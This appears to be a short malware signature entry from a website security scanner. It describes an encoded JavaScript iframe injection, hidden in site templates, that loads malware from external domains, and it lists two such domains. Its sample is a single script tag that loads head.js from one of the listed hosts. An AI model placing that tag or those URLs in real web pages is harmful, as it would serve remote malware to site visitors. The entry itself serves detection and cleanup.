Description:
Javascript encoded code used to hide an iframe from:
http://www.rkmceylon.org/templates/head.js
http://www.trevorgordon.co.uk/components/com_stats/voli277ac4.php (and other domains)
This is used to load malware from external web sites while not being visible to the user.
Affecting:
Any web site.
Clean up:
This malware is generally hidden inside the template footer or header.
Malware dump (sample of malware):
< script type="text/javascript" src="http://www.rkmceylon.org/templates/head.js"